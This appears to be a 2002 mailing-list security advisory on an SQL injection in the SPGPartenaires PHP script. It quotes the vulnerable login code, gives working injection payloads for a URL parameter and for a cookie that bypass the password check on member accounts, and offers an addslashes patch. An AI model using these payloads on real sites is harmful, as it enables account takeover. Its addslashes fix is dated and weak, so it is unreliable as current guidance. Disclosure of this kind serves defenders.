Informations : °°°°°°°°°°°°°° Version : ? -> 3.0.1 Website : http://www.scripts-php-gratuits.com Problem : SQL Injection -> Access to member's accounts PHP Code/Location : °°°°°°°°°°°°°°°°°°° modif/ident.php : -------------------------------------------------- [...] $sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'"; $re=@mysql_db_query($db_name,$sql,$connect); $result=@mysql_fetch_array($re); if(empty($result[0])) { header("location: index.php?msg=Identification+incorrecte+!"); } else { setcookie("SPGP",$id."||".$pass,time()+84600,""); header("location: index2.php"); } [...] -------------------------------------------------- modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php : -------------------------------------------------------------- <? if(!isset($SPGP)) { header("location: index.php?msg=Veuillez+vous+identifier+!"); } else { $inf=explode("||",$SPGP); [...] $sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'"; $re=@mysql_db_query($db_name,$sql,$connect); $result=@mysql_fetch_array($re); if(empty($result[0])) { header("location: index.php?msg=Veuillez+vous+identifier+!"); } [...] -------------------------------------------------------------- Exploits : °°°°°°°°°° http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''=' or QUERY : ?SPGP=[ID]%7C%7C'%20OR%20''=' with : - modif/delete.php - modif/index2.php - modif/modif.php - modif/modif_suite.php Patch : °°°°°°° In modif/ident.php replace the line : ---------------------------------------------------------------- $sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'"; ---------------------------------------------------------------- by : --------------------------------------------------------------- $sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND motdepasse='".addslashes($pass)."'"; --------------------------------------------------------------- And in the other files replace the line : --------------------------------------------------------------- $sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'"; --------------------------------------------------------------- by : --------------------------------------------------------------- $sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND motdepasse='".addslashes($inf[1])."'"; --------------------------------------------------------------- A patch can be found on http://www.phpsecure.org. More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/SPGpartenaires.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
This archive was generated by hypermail 2b30 : Fri Dec 20 2002 - 19:54:28 PST